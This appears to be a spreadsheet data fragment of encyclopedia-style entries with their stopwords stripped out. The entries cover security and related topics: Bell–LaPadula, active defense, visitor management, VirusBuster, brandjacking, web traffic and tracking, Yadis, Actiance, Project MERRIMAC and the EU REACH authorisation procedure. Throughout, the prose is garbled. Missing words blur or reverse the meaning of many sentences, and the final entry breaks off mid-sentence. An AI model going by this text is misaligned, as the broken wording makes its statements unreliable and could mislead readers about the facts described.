"write read down" (wurd). compare biba model, clark–wilson model, chinese wall model. with bell–lapadula, users create content security level (i.e. secret researchers create secret top-secret files create public files; write-down). conversely, users view content security level (i.e. secret researchers view public secret files, view top-secret files; read-up). bell–lapadula model explicitly defined scope. treat following extensively: covert channels. passing information pre-arranged actions described briefly. networks systems. later modeling work address topic. policies outside multilevel security. work early 1990s showed version boolean policies, published policies. strong star property strong star property alternative *-property, subjects write objects matching security level. thus, write-up operation permitted usual *-property present, write-to-same operation. strong star property usually discussed context multilevel database management systems motivated integrity concerns. this strong star property anticipated biba model shown strong integrity combination bell–lapadula model resulted reading writing single level. tranquility principle tranquility principle bell–lapadula model states classification subject object change referenced. there forms tranquility principle: "principle strong tranquility" states security levels change normal operation system. "principle weak tranquility" states security levels never change violate defined security policy. weak tranquility desirable allows systems observe principle least privilege. that processes start clearance level regardless owners clearance, progressively accumulate higher clearance levels actions require limitations only addresses confidentiality, control writing (one form integrity), *-property discretionary access control covert channels mentioned addressed comprehensively tranquility principle limits applicability systems security levels change dynamically. allows controlled copying high trusted subjects. [ed. many systems using include dynamic changes object security levels.] also biba integrity model clark–wilson model discretionary access control graham–denning model mandatory access control multilevel security security modes take-grant protection model (networking) notes references</t>
  </si>
  <si>
    <t>Active defense</t>
  </si>
  <si>
    <t>active defense refer defensive strategy military cybersecurity arena. cybersecurity arena, active defense mean "asymmetric defenses," namely defenses increase costs cyber-adversaries reducing costs cyber-defenders. example, active defense data protection strategy leverages dynamic data movement, distribution, re-encryption make data harder attack, steal, destroy. prior data protection approaches relied encryption data rest, leaves data vulnerable attacks including stealing ciphertext, cryptographic attack, attacks encryption keys, destruction encrypted data, ransomware attacks, insider attacks, others. three computing conferences explored moving target defense strategy network application-level security well, instance rotating addresses dynamically changing network topologies. production implementations provided companies applications including legacy systems, communications, election security. additionally, "active defense measures" often another term used define refer offensive cyber operations (ocos) computer network attacks (cnas). some defined active defenses including deception honeypots, seek confuse attackers traps advanced forensics. examples honeypot technologies include illusive networks, trapx, cymmetria, attivo, others. other types active defenses might include automated incident response, attempts together different response strategies order increase work attackers decrease work defenders.the department defense defines active defense "the employment limited offensive action counterattacks deny contested area position enemy." this definition specify whether refers physical actions, cyber-related actions. recently, department homeland security financial institutions identified active defense priority security industrial infrastructure systems. part broader push greater resiliency, national institute standards technology 800-160 volume framework gone further, providing guidance standardization active defense. also proactive cyber defence software-defined networking concept active defence china's military strategy references</t>
  </si>
  <si>
    <t>Visitor management</t>
  </si>
  <si>
    <t>visitor management refers practices hardware additions administrators monitor usage building site. gathering information, visitor management system record usage facilities specific visitors provide documentation visitor's whereabouts.proponents information-rich visitor management system point increased security, particularly schools, benefit. parents demand action schools protect children sexual predators, school districts turning modern visitor management systems track visitor's stay, also check visitor's information national local criminal databases. visitor management technologies computer visitor management systems basic computer electronic visitor management systems computer network monitor record visitor information commonly hosted ipad touchless kiosk. electronic visitor management system improves upon negative points paper system. visitor checked national local databases, well in-house databases potential security problems. visitor management software service another alternative visitor management software on-line, based visitor management system offered service. saas visitor management software schools allows administrators screen visitors upon entrance, often checking offender status, restrict access unauthorized entrants. saas visitor management software real estate industry allows landlords managers remotely control monitor access rights without need pass physical keys keycards tenants. saas visitor management software commercial offices allows facilities managers automate building's reception area advocates type system claiming variety benefits, including security privacy. many modern saas visitor management systems tablet-based apps, thin client solutions operating software service cloud. visitor management systems smart phones smart phone based visitor management system work similar based system, hosts real-time notifications alerts device. hosts allow deny visit guest based interest availability. smart phone based visitor management systems also enable features like automatic touchless sign-in using technologies include codes geofencing. integrations systems visitor management systems offer integration workplace management systems, access control wi-fi credentials. types visitor management systems paper-based systemon-premise softwarecloud-based software also access control optical turnstile identity document proximity card boom barrier cross-device tracking references external links access control curlie</t>
  </si>
  <si>
    <t>Visit filter</t>
  </si>
  <si>
    <t>visit filters used analysis software include exclude data visit session. specifying ranges types data limit data analyzed, letting focus relevant activity. also filter references</t>
  </si>
  <si>
    <t>RCMP Technical Security Branch</t>
  </si>
  <si>
    <t>technical security branch royal canadian mounted police holds jurisdiction forms computer crime canada. references external link royal canadian mounted police technical security branch mandate</t>
  </si>
  <si>
    <t>VirusBuster</t>
  </si>
  <si>
    <t>virusbuster ltd. hungarian security software vendors. fully hungarian owned company develops software brand name "virusbuster" hungarian international market protect users' computers malware programs security threats. august 2012, virusbuster ltd. announced discontinuation antivirus products. after virusbuster shut down, entire development malware analysis team joined sophos. history legal trade predecessor firm began develop antiviral products 1980s. software named "virsec" came time, well known vendors appeared similar solutions. 1992 virsec renamed "virusbuster". later official formation firm, name became name company well. 1997 official foundation virusbuster took place. next years, company produced mainly anti-viral products hungarian market, primarily governmental sector. 2000 year international opening. virusbuster's products began participate international test summer year, firm began build international partnerships also 2000. between 2000 2003 virusbuster steadily extended portfolio. developments manifested increasing number protected platforms systems, also layered security products target threats, management system firm's security products. with achievements, company could offer effective security solutions every organizational customers. 2001 first year international foreigner company australian leprechaun licensed virusbuster's antiviral technology integrate security products. between 2003 2006 virusbuster strengthened eastern european worldwide market positions. antiviral engine company became independent product, thus integrated several firms' security solutions. these years, virusbuster appeared american market. august 2012, agnitum, security expert manufacturer outpost range security products, announced acquisition antivirus technology infrastructure long-term partner virusbuster. october 2012, owner virusbuster made decision products services going removed market. entire development malware analysis team joined sophos. products virusbuster provided customized, multi-level virus protection solutions individual, home size organizational customer groups, furthermore virusbuster internet security suite provides full protection home users. company's security products cover mainstream operating systems, including workstation server platforms. according independent it-professionals international test labs products company pretty good solutions, aspects speed efficiency. some security analysts said virusbuster's user interface rather "traditional", according others almost "old fashioned" provides better transparency easier manageability. according general opinions, products company covered important business platforms protected every security threat. technology licences aside retail solutions different market segments, also important company antiviral engine became independent product. several international companies licensing virusbuster's technology, integrated products. (outpost security suite, kaspersky, proteatools) international partnerships beside companies mentioned above, important strategic partners company different international collaboration projects were: microsoft microsystems novell name misuse beginning 2008 virusbuster's security researchers found computer malware package using name company trick users. worm spreading attachment infected e-mails name "virusbuster.personal.v3.20.regfile.by.arcade.exe". analysis classification virus difficult task, since worm variant well known rather "bagle" malware family. this first example name misuse; virusburst fake antispyware program 2006. name similar virusbusters' name probably accidentally, case similarity perfect. also 2008 virus-writing group announced shut down, prominent members team also used 'virusbuster' alias. also antivirus software comparison antivirus software comparison computer viruses external links original site, archived</t>
  </si>
  <si>
    <t>Brandjacking</t>
  </si>
  <si>
    <t>brandjacking activity whereby someone acquires otherwise assumes online identity another entity purposes acquiring person's business's brand equity. term combines notions 'branding' 'hijacking', used since least 2007 appeared business week referencing term used publication firm markmonitor (markmonitor firm, zeno group, coined phrase; markmonitor registered "brandjacking index" trademark, term "brandjacking" own). tactic often associated individual corporate identities social media sites, described quentin langley's 2014 book brandjack, used alongside conventional (offline) campaign activities. while similar cybersquatting, identity theft phishing nature possible tactics, brandjacking usually particular politician, celebrity business indirect nature. brandjacker attempt reputation target selfish reasons seek damage reputation target hostile, malicious political campaigning reasons. these reasons directly financial, effects original brand-holder often include financial loss example, negative publicity result termination celebrity's sponsorship deal, corporation, potentially lead lost sales reduced share price. brandjacking examples coca-cola 2013, commercial, "the bitter taste sugar", oxfam (oxfam novib netherlands) parodied coca-cola zero commercial, drawing attention unsustainable business practices. starbucks 2006, youtube-hosted video presented spoof advert starbucks frappuccino underlining contrast consumption poverty. nestle march 2010, greenpeace campaigners used youtube video parodied nestlé's kitkat 'take break' advertising, draw attention multinational's palm unsustainable operations indonesia consequent impact orangutan habitats. protesters outside nestlé's head office croydon carried signs words 'give break' 'killer' printed distinctive white gill sans. exxon mobil 2008, twitter account (@exxonmobilcorp) purporting views official spokesperson company, later exposed fake. also twitter, @bpglobalpr official voice satirical account grown popularity 2010 deepwater horizon spill, attracting followers official twitter account. politicians fake facebook pages created president barack obama republican governor sarah palin (among politicians). major corporations also subject brandjack-based protests facebook. fake blogs considered form brandjacking created critic opponent person brand supposed behind blog. affiliate brand bidding this tactic used affiliate marketers. some consider tactics unethical black hat. method keywords related site product, seemingly competitor. colleges universities 2008, college guidebook company college prowler created hundreds facebook groups purporting consist actual incoming first-year students various universities order surreptitiously gather personal data promote business. june 2011, greenpeace activists launched campaign mattel's packaging supplier, app, said desecrating indonesian rainforests, using images mattel dolls barbie ken. greenpeace video showed dumping barbie date girls deforestation"), group created mock twitter feud stunt involving barbie pink bulldozer, unfurled banner wall mattel’s angeles headquarters; 500,000 people sent protest emails mattel. october 2011, mattel announced global policy keep rainforest destruction supply chains. brandjack author quentin langley praised greenpeace integration online (youtube, twitter) offline (stunts, etc.). brandjacking avoidance brandjacking avoidance include: pre-emptive registration brand names sub-brands screen names social media sites. staying vigilant social media general media monitoring tools seek evidence infringement legal action seen responsible infringement.however, action brandjackers supporters actually draw attention problem (the streisand effect). example, following greenpeace's kitkat campaign, nestlé video removed youtube, greenpeace quickly re-posted video-sharing site vimeo.com highlighted attempted censorship using twitter social media. attempts nestlé constrain user activity facebook page fanned controversy. also culture jamming cybersquatting fake blog identity theft phishing subvertising references external links online brand-jacking increasing</t>
  </si>
  <si>
    <t>Brand page</t>
  </si>
  <si>
    <t>brand page (also known page page), online social networking parlance, profile social networking website considered distinct actual user profile created managed least registered user representation non-personal online identity. this feature used represent brands organizations associated with, properties owned general interests favored user hosting network. while also potentially manageable registered user, pages distinguished groups pages usually designed managers direct messages posts subscribing users (akin newsletter blog) promote brand, groups usually historically formed discussion purposes. history prior 2007, websites made non-personal profile pages. last.fm, established 2002, used music recommendation service automatically generate "artist pages" serve portals biographies, events artist-related playlists. this approach, however, explicitly controlled artists music groups automatic nature artist pages; pages, example, could created erroneous misspellings miscredits works accepted as-is audioscrobbler recommendation service used last.fm. furthermore, last.fm never advertised social networking service, despite accruing myriad social features since 2002. high-profile usage model facebook's pages (formerly known "fan page" 2010) feature, launched 2007; could page april 2010, parlance replaced "like". foursquare, location-oriented social networking site, launched "brands" feature allowing creation specialized brand pages january 2010 (with intel first user), become "self-serve" (controllable individuals employed page brand owners) august 2011. linkedin, enterprise-oriented social networking service, launched "company pages" november 2010. google+, current social networking service operated google, launched "pages" feature october 2011. november 2012, amazon announced amazon pages giving brands self-service control presence site. december, twitter announced would roll "brand pages" part major user interface redesign 2012. features increasingly, brand pages make following features: header banners ability post blogs replies brand page name brand page ability administer multiple pages photos video maps (including physical location page) subscribers other appstwitter made header banners launch brand pages, facebook made "cover photos" re-design brand pages march 2011. uses organizations brands regularly make pages order syndicate news upcoming events, especially off-site blog posts, subscribing users. page subscription numbers also used metric trust interest associated brand. interests also indexed pages, often basis formation mass social movements (i.e., arab spring, occupy wall street). newsroom accounts pages also used newsroom accounts. newsroom account refers microblogging social networking account branded owned publishing broadcasting organization dedicated solely syndicating content particular category content published original website organization. such accounts come increased usage news organizations means which: news organization's presence social networking microblogging website increased news organization specialize content syndication selective users wish subscribenews organizations make multiple newsroom accounts typically allow either online editors multiple employed authors edit update syndications newsroom content. such accounts typically marked graphic icons make brand symbol combined distinct colors assigned account. examples newsroom accounts pages include facebook pages guardian newspaper's technology newsroom. impact pseudonyms usage pseudonyms social networking services, long considered preserve user privacy, partially affected promotion pseudonyms, social networking services encouraged users create pages pseudonyms implemented legal name requirements user profile registration (i.e., york resident stefani germanotta keeping separate personal user profile legal name maintaining page stage name pseudonym lady gaga). interest-based connections pages created represent interests, number attempts create vertical social networking services (i.e., ning) leveled 2010s. social network advertising also targeted users based upon page subscriptions. research research brand pages looked anthropomorphic cues brand pages affect engagement behaviour consumers. also fansite landing page references</t>
  </si>
  <si>
    <t>Web traffic</t>
  </si>
  <si>
    <t>traffic amount data sent received visitors website. since mid-1990s, traffic largest portion internet traffic. this result determined number visitors number pages visit. sites monitor incoming outgoing traffic parts pages site popular apparent trends, specific page viewed mostly people particular country. there many ways monitor traffic, gathered data used help structure sites, highlight security problems indicate potential lack bandwidth. traffic welcomed. some companies offer advertising schemes that, return increased traffic (visitors), screen space site. sites also often increase traffic inclusion search engines search engine optimization. analysis analytics measurement behavior visitors website. commercial context, especially refers measurement aspects website work towards business objectives internet marketing initiatives; example, landing pages encourage people make purchase. notable vendors analytics software services include google analytics, digital analytics (formerly core metrics) adobe omniture. several types research done evaluate overall performance website. instance, shan presented framework assess site's technical service performance. however, said framework able measure user satisfaction help metrics. pages visit average visit duration bounce rate exit pages visitors returning visitors conversion funnelwebmasters data google analytics metrics help evaluate website traffic measurement traffic measured popularity websites individual pages sections within site. this done viewing traffic statistics found server file, automatically-generated list pages served. generated file served. page considered file, images also files, thus page images could generate hits (the images page itself). page view generated visitor requests page within website visitor always generate least one-page view (the main page) could generate many more. tracking applications external website record traffic inserting small piece html code every page website.web traffic also sometimes measured packet sniffing thus gaining random samples traffic data extrapolate information traffic whole across total internet usage. following types information often collated monitoring traffic: number visitors. average number page views visitor high number would indicate average visitors deep inside site, possibly like find useful. average visit duration total length user's visit. rule, time spend they're interested company prone contact. average page duration long page viewed. pages viewed, better company. domain classes levels addressing information required deliver pages content. busy times popular viewing time site would show would best time promotional campaigns would ideal perform maintenance most requested pages popular pages most requested entry pages entry page first page viewed visitor shows pages attracting visitors most requested exit pages requested exit pages could help find pages, broken links exit pages popular external link paths path sequence pages viewed visitors entry exit, paths identifying customers site referrers; host track (apparent) source links determine sites generating traffic particular page.websites produce traffic rankings statistics based people access sites using toolbars means online measurements. difficulty look complete traffic picture site. large sites usually hire services companies nielsen netratings quantcast, reports available subscription. control amount traffic seen website measure popularity. analyzing statistics visitors possible shortcomings site look improve areas. also possible increase popularity site number people visit limiting access sometimes important protect parts site password, allowing authorized people visit particular sections pages. some site administrators chosen block page specific traffic, geographic location. re-election campaign site u.s. president george bush (georgewbush.com) blocked internet users outside u.s. october 2004 reported attack site.it also possible limit access server based number connections bandwidth expended connection. apache http servers, accomplished limitipconn module others. from search engines majority website traffic driven search engines. millions people search engines every research various topics, products, daily surfing activities. search engines keywords help users find relevant information, major search engines developed unique algorithm determine websites placed within search results. when user clicks listings search results, directed corresponding website data transferred website's server, thus counting visitors towards overall flow traffic website. search engine optimization (seo), ongoing practice optimizing website help improve rankings search engines. several internal external factors involved help improve site's listing within search engines. higher site ranks within search engines particular keyword, traffic receive. increasing traffic traffic increased placement site search engines purchase advertising, including bulk e-mail, pop-up ads, in-page advertisements. traffic also purchased traffic providers deliver targeted traffic. however, buying traffic negatively affect site’s search engine rank. traffic increased attracting visitors site, also encouraging individual visitors "linger" site, viewing many pages visit. (see outbrain example practice) page listed first pages search, odds someone finding diminishes greatly (especially competition first page). very people past first page, percentage subsequent pages substantially lower. consequently, getting proper placement search engines, practice known seo, important website itself. traffic overload much traffic dramatically slow prevent access website. this caused file requests going server handle intentional attack site simply caused over-popularity. large-scale websites numerous servers often cope traffic required, likely smaller services affected traffic overload. sudden traffic load also hang server result shutdown services. denial service attacks denial-of-service attacks (dos attacks) forced websites close malicious attack, flooding site requests could cope with. viruses also used coordinate large-scale distributed denial-of-service attacks. sudden popularity sudden burst publicity accidentally cause traffic overload. news item media, quickly propagating email, link popular site cause boost visitors (sometimes called flash crowd slashdot effect). fake traffic traffic generated humans. there also "fake traffic", traffic generated third party software, often referred bots. this type traffic damage website's reputation, visibility google, overall domain authority. according estimates cited interactive advertising bureau 2014, around third traffic generated internet bots malware. overall worldwide according mozilla since january 2017, half traffic encrypted https. hypertext transfer protocol secure (https) secure version http, secures information data transfer user's browser website. also data mining (internet) internet traffic page view unique user traffic generation model references bibliography machlis, sharon june 2002). "measuring site traffic" computerworld.com retrieved january 2005 matt johnson 2011). news look case freelance journalist glenn fleishman site linked maccentral retrieved july 2005</t>
  </si>
  <si>
    <t>Web tracking</t>
  </si>
  <si>
    <t>tracking practice operators websites third parties collect, store share information visitors’ activities world wide web. analysis user's behaviour used provide content enables operator infer preferences interest various parties, advertisers. tracking part visitor management. uses tracking uses tracking include following: advertising companies actively collect information users make profiles used individualize advertisements. user activities include websites visited, watched videos, interactions social networks, online transactions. websites like netflix, youtube collect information shows users watch, helps suggest shows might like. search engines like google keep record users search for, could help suggest relevant searches future. enforcement agencies tracking individuals solve crimes. analytics focuses performance website whole. tracking give insight website used long user spends certain page. this used interest content website. usability tests practice testing easy design use. users observed complete tasks. this would help identify usability problems website's design fixed easier navigation. methods tracking address every device connected internet assigned unique address, needed enable devices communicate other. with appropriate software host website, address visitors site logged also used determine visitor’s geographical location. logging address can, example, monitor person voted once, well viewing pattern. knowing visitor’s location indicates, besides things, country. this may, example, result prices quoted local currency, price range goods available, special conditions applying cases requests responses certain country blocked entirely. internet users circumvent censorship geo-blocking protect personal identity location stay anonymous internet using connection. http cookie http cookie code information embedded onto user’s device website user visits website. website might retrieve information cookie subsequent visits website user. cookies used customise user’s browsing experience deliver targeted ads. some browsing activities cookies store are: pages content user browsed, user searched online, user clicked online advertisement, time user visited site. first- third-party cookies first-party cookie created website user visiting. these cookies considered "good" since help user rather them. main goal first-party cookies recognize user preferences desired settings applied.a third-party cookie created websites user visits. they insert additional tracking code record user's online activity. on-site analytics refers data collection current site. used measure many aspects user interactions including number times user visits.restrictions third-party cookies introduced browsers bypassed tracking companies using technique called cname cloaking, third-party tracking service assigned record first-party origin domain (usually cname) masqueraded first-party even though separate entity legal organisational terms. this technique blocked browsers blockers using block lists known trackers. other methods canvas fingerprinting allows websites identify track users using html5 canvas elements instead using browser cookie. cross-device tracking used advertisers help identify channels successful helping convert browsers buyers. click-through rate used advertisers measure number clicks receive number impressions. mouse tracking collects users mouse cursor positions computer. browser fingerprinting relies browser identifying users every time online track activity. through fingerprinting, websites determine users operating system, language, time zone, browser version without permission. supercookies "evercookies" used track users across web, also hard detect difficult remove since stored different place standard cookies. session replay scripts allows ability replay visitor's journey site within mobile application application. "redirect tracking" redirect pages track users across websites. beacons commonly used check whether individual received email actually read favicons used track users since persist across browsing sessions. federated learning cohorts (floc), trialed google chrome 2021, intends replace existing behavioral tracking relies tracking individual user actions aggregating server side browser declaring membership behavioral cohort. criticized floc retaining fundamental paradigm surveillance economy, "each user’s behavior follows site site label, inscrutable glance rich meaning know". controversy browsing linked user's personal information. location, interests, purchases, revealed page user visits. this allows draw conclusions user, analyse patterns activity. tracking controversial applied context private individual; varying degrees subject legislation eu's ecommerce directive uk's data protection act. when done without knowledge user, considered breach browser security. justification business-to-business context, understanding visitor's behaviour order identify buying intentions seen many commercial organisations effective target marketing activities. visiting companies approached, online offline, marketing sales propositions relevant current requirements. from point view sales organisation, engaging potential customer actively looking produce savings otherwise wasted marketing funds. prevention users control third-party tracking. opt-out cookies enables users block websites installing future cookies. websites blocked installing third party advertisers cookies browser prevent tracking users page. track browser setting request application disable tracking user. enabling feature send request website users disable cross-site user tracking. contrary popular belief, browser privacy mode prevent (all) tracking attempts usually blocks storage information visitor site (cookies). help, however, live data transmissions like various fingerprinting methods. such fingerprints easily de-anonymized. many times, functionality website fails. example, able site, preferences lost.some browsers "tracking protection" "tracking prevention" features block trackers. also behavioral analytics provides insight actions people online, usually purchase products online. consumer data industry association employee monitoring workplace surveillance gather information activities locations employees. gemini space gopher alternatives serving mostly textual content without tracking google chrome#user tracking concerns tracking track location entity object remotely internet privacy level privacy individual connected internet internet tracking information privacy network surveillance track trace used track product's status monitor location transported analytics reporting analysis website data improve user's experience beacon invisible graphic placed website monitor behavior user visiting. references external links "princeton transparency accountability project (webtap)". retrieved 2018-02-20. monitor websites services find user data companies collect, collect with measurement platform, study privacy, security, ethics consumer data usage "openwpm privacy measurement framework". github. retrieved 2018-02-20.</t>
  </si>
  <si>
    <t>Basque Cybersecurity Centre</t>
  </si>
  <si>
    <t>basque cybersecurity centre (bcsc) organization appointed basque government promote cybersecurity basque country. made departments basque government (economic development infrastructures, safety, public governance, education) technology centres (tecnalia, vicomtech, ik4-ikerlan, basque center applied mathematics). bcsc currently member first, global association devoted offering coordinated response event computer attacks, achieved cert homologation. also takes part collaborations analogous centres international scale: member international cybersecurity consortium global epic. member european cyber security organisation (ecso). partnership instituto nacional ciberseguridad (incibe) incibe-cert. entity acknowledged european union agency cybersecurity (enisa). scope services csirt team, bcsc offers following services: cybersecurity event management, offering advice phone email, spanish basque. vulnerability handling, ensuring communication among people firms discover them, software device developers. malware analysis, developing strategies detection, protection elimination. releasing warnings safety vulnerabilities systems, lower risk. early alert case risk becomes actual threat. spreading information publishing good practice guides scope cybersecurity. also publishing situation reports. collaborating fast response teams, internet service providers, devices manufacturers entities, sharing information. training professionals, workshops seminars promote learning field cybersecurity. awareness building young people companies associations working industrial field, seminars focusing need implement necessary cybersecurity measures.among services, bcsc cooperates basque police, monitoring public networks mitigate cyber-threats citizens and/or companies risk. also coordinates r&amp;d&amp;i initiatives, support startups initiative bind 4.0. references external links official website</t>
  </si>
  <si>
    <t>Yadis</t>
  </si>
  <si>
    <t>yadis communications protocol discovery services openid, oauth, connected yadis while intended discover digital identity services, yadis restricted those. other services easily included. yadis either traditional newer i-name, i-name must resolve url. so-called yadis either equals yadis url) resolved i-name. furthermore, yadis specifies yadis retrieve service descriptor called yadis resource descriptor. this descriptor follows xrds format connects several services, like authentication authorization yadis url. each service description parameters. modular architecture yadis follows rest-ful, "small pieces loosely joined" paradigm proven successful development web. basic assumption identities addressed urls identifiers (such i-names) resolved urls. yadis associates xrds document xml-based capability file) expresses associated capabilities services. owner yadis identifier choose services wishes xrds document. after retrieving document, relying party website accepting yadis identifiers select appropriate services xrds document, e.g. protocol authentication. this allow existing sites, like blogs, easily implement basic yadis functionality (for instance, redirecting users arrive blog relevant information person blog belongs also making possible build advanced applications (for example, allowing complex queries site-owner's information submitted directly yadis site). discovery yadis resource descriptor capability document associated identity found either: following custom http response header called x-xrds-location, equivalent entry html head section, called&lt;meta http-equiv="x-xrds-location" content="http://example.com/yadis.xml"&gt;, requesting special mime type called application/xrds+xml performing http identity url.developers choose alternatives implement, based factors whether software identity not. xrds documents here example xrds capability document: xrds document returned, using listed mechanisms, url, would express following information: yadis identity url. this supports openid protocol, servers delegates. this supports version version protocol, delegate. owner identity prefers sign-on using livejournal account openid protocol (priority 10). possible (e.g. relying party support openid, livejournal server unavailable), owner would like http://mylid.net/liddemouser (priority 20), followed myopenid service (priority 50). lid, openid developer community yadis initiated developers light-weight identity (lid) openid protocols. this collaboration joined members oasis technical committee, particularly working i-names. however, yadis open initiative, developers start using xrds lightweight capabilities description, making possible "mix match" approach building yadis-enabled applications, enabling application developers choose balance ease implementation hand, range features other. also xrds liberty alliance infocard openid light-weight identity (lid) i-name external links yadis documentation</t>
  </si>
  <si>
    <t>Actiance</t>
  </si>
  <si>
    <t>actiance (formerly known facetime communications) american-based multinational corporation developed platforms required enable security, management compliance unified communications, social media channels. headquartered redwood city, california, actiance supported leading social networks, unified communications providers instant messaging platforms, including facebook, linkedin, twitter, aol, google, yahoo!, skype, microsoft, cisco. history 1997–2007 established 1997, actiance provided call center enablement instant messaging, chat email. working aol, yahoo!, microsoft, actiance established industry's first agreements (certified access programs) providing enhanced access public networks. 2000, actiance awarded "most innovative real-time collaboration" microsoft exchange conference. 2001, company launched first compliance security solution networks, auditor. aimed specifically financial services sector needed comply government regulations enabled financial services organizations ability leverage power public instant messaging networks aol, microsoft yahoo! time-sensitive communications, ensuring administrative controls place comply government regulations. 2003, financial services firms worldwide needed comply securities exchange commission nasd record retention supervisory requirements using auditor.in 2004, actiance introduced real time guardian (rtg), gateway filtering unauthorized connections stopping peer-to-peer (p2p) filesharing sites kazaa, grokster morpheus. actiance added features rtg, including support unified communication platforms microsoft office communications server lotus sametime. 2005, zero defence system added. 2008 present 2008, actiance added capabilities rtg’s successor, unified security gateway (usg), providing managers management, security control social networking sites, 20,000 individual facebook widgets real-time applications. making first secure gateway combine content monitoring, management security applications, social networks, instant messaging unified communications, filtering, malware antivirus protection. 2010 another first actiance launched vantage, imauditor’s successor, included stringent security compliance controls skype enterprise. vantage provides granular security, policy controls, compliance features real-time unified communications (uc) providing management widest variety real-time communications platforms; including microsoft office communications server, lotus sametime, public instant messaging platforms windows live skype, conferencing industry-focused networks like reuters, bloomberg, yellowjacket. later year includes support microsoft lync server. also 2010, actiance launched socialite enable, security, management, compliance solution enterprises using social networks. socialite provides granular control applications facebook, linkedin twitter, allows organizations comply regulatory compliance demanded organizations financial industry regulatory authority (finra) financial services authority. available software-as-a-service deployment (saas) on-premises installation module usg, socialite enable allows organizations control social media features communications users corporate network situated remotely. january 2011, facetime communications announced changed name actiance following purchase facetime brand apple.in june 2011, actiance announced socialite engage, platform allows distributed teams share content, engage clients prospects, analyze impact content social media sites. designed specifically enable investment insurance professionals distribute pre-approved content, socialite engage enables organization manage social media secure compliant environment, allowing users glance content impact. also leverages third-party data sources, internal systems data feeds, highlights channels effective identifies potential sales leads. 2017, actiance merged portland company smarsh, provides archiving solutions compliance risk management. both companies currently owned investment management. references external links official website</t>
  </si>
  <si>
    <t>Project MERRIMAC</t>
  </si>
  <si>
    <t>project merrimac domestic espionage operation coordinated office security cia. involved information gathering procedures infiltration surveillance washington-based anti-war groups might pose potential threats cia. however, type data gathered also included general information infrastructure targeted communities. project merrimac twin program, project resistance coordinated office security. addition, twin projects branch operations relayed civilian information parent program, operation chaos. assassination archives research center believes project merrimac began february 1967. also operation chaos project resistance cointelpro references external links project merrimac internet archive chaos, merrimac, resistance development surveillance technology risk abuse economic information</t>
  </si>
  <si>
    <t>REACH authorisation procedure</t>
  </si>
  <si>
    <t>authorisation procedure regulatory tools european regulation (ec) reach n°1907/2006 aiming substances high concern (svhc) included annex reach, replace technically economically feasible alternatives. this process concerns manufacturers, importers downstream users substances. only representatives foreign manufacturers also apply authorisation. authorisation today impacts many industries, including aerospace, electronics, automotive, energy, paint industries. moreover, defence applications facto exempted authorisation process. member states must decide case case basis whether company benefit procedure (outlined article reach). general principles reach regulation relies four main procedures: registration, evaluation, restriction authorisation chemical substances. from candidate list annex reach member states european chemicals agency, request european commission, submit propositions identify substances very high concern, based criteria laid article reach: carcinogenic, mutagenic toxic reproduction meeting criteria classification category accordance regulation n°1272/2008 (clp), persistents bioaccumulative toxic (pbt), very persistent bioaccumulative (vpvb), substances equivalent concern.this work supported expert groups echa member states based various criteria screening methodologies order identify relevant svhcs.annex last step prioritisation process. lists svhcs exhibit particularly high risk human health environment (based inherent properties, quantities uses) order forbid market. recommendations include svhcs annex made echa debated relevant stakeholders (member states, companies, ngos, etc.). final decision inclusion substance annex taken european commission. when listed annex reach regulation, substance therefore assigned “sunset date” banned, unless authorisation granted definite period time. today (2022/03/02), substances listed candidate list substances (date 2022/03/02) listed annex xiv. candidate list usually updated every months annex updated every months. scope authorisation authorisation procedure complex concerns manufacturers, importers, downstream users only representatives substances which: alternative annex substance deemed technically and/or economically feasible alternatives exist still need time fully qualified deployed.the banning takes effect "sunset date". date, substance possible companies granted authorisation submitted dossier latest application date. latter indeed benefit transitional period, pending commission final decision. exception made downstream users case upstream stakeholder, within supply chain, granted authorisation substance use. from point view, supply chain substance matters. instance, subcontractors authorised importers covered annex substance supplied supply chain authorisation application made granted. finally, downstream users need apply authorisation nevertheless obligation notify use(s) echa (art. reach) check compliance risk management measures. concerned companies thus invited take measures soon substance enters candidate list enquiring impacted actors strategies. applied "use" authorisation process authorisation applications made several specific uses. article reach thus defines “use” “any processing, formulation, consumption, storage, keeping, treatment, filling containers, transfer container another, mixing, production article use”. framework authorisation dossier, description applied specify market, supply chain, processes type articles concerned. applied consistent enough cover exposure scenario also analysis alternatives. applied mistaken identified corresponds reach registration process. identified focuses process consider performances markets questions. cases authorisation needed exceptions exist, application authorisation required: manufacturer substance require authorisation since considered use, impurities, additives components another substance constitute substance (except annex refers it), formulation mixture considered reach substance annex subject authorisation exceeds required concentrations.if production article require authorisation point, finished articles require authorisation market, even though still contain substance subject authorisation. consequently, articles requiring annex substance still produced outside imported. particular case, future restrictions procedure could however limit placing market articles risk remains (art. 58.6 reach). review period review period duration commission authorises substance sunset date. following durations considered review periods: years: case analysis alternatives report insufficient and/or doubts remain impacts granting authorisation alternatively, quick transition possible; years: standard duration develop technically economically feasible alternative solution; years years: long cycle investments, risks. exceptional cases, longer duration considered demonstrated years would create disproportionate impacts compared longer review period.at review period, application authorisation reassessed evaluate progress made terms research development substitution. applications extend review period made latest months expiry date. european commission also reduce duration circumstances appear, terms risks impacts. only court european union qualified rule appeals applications authorisation. member states are, turn, responsible controlling decision's implementation. application authorisation dossier (afa) application authorisation (afa) made three main parts: chemical safety report (csr), analysis alternatives (aoa) socio-economic analysis (sea). goal dossier demonstrate alternative substance immediately available, risks controlled social economic advantages substance outweigh risks human health environment. dossier usually takes months preparation echa's guidelines available assist drafting. application authorisation filed latest application date (lad), months sunset date. enables benefit transitional period, pending european commission's decision. basic made several substances case, grouping need demonstrated basis annex reach), several uses applied several companies. latter case called joint application requires appointing main applicant contact point echa. submissions routes submission routes planned reach regulation: content dossier chemical safety report (csr) adequate control route, goal chemical safety report prove threshold values respected; socio-economic route, goal chemical safety report demonstrate risks reduced minimum. chemical safety report contains: summary risk management measure declaration implementation communication risk management measures along supply chain identity substance identified uses assessment human environmental hazard assessment assessment properties substance included annex exposure assessment risk characterisation analysis alternatives (aoa) aims demonstrate alternative appropriate, i.e. technically economically feasible, less risky available. analysis alternatives therefore presents substance's alternative solutions contains: part summary part description substance's purpose part identification potential alternatives part description suitability availability alternatives part conclusion report socio-economic analysis (sea) socio-economic analysis compulsory document socio-economic route also complete application justified adequate control route. aims demonstrate advantages substance outweigh risks human health environment. purpose, applicants must compare scenarios: ‘use scenario’ (continued substance) hand ‘non-use scenario’ (cease substance) hand discuss impacts. contains: part summary part definition objective scope part analysis impacts part comparison impacts part conclusion report submission dossier dossiers submitted submission windows february, may, august november. echa strongly advise follow windows plenary sessions committees (rac seac) organised march, june, september december year. submitting plenary sessions, submission windows, therefore helps efficient assessment application. applications deemed received business rules check successfully 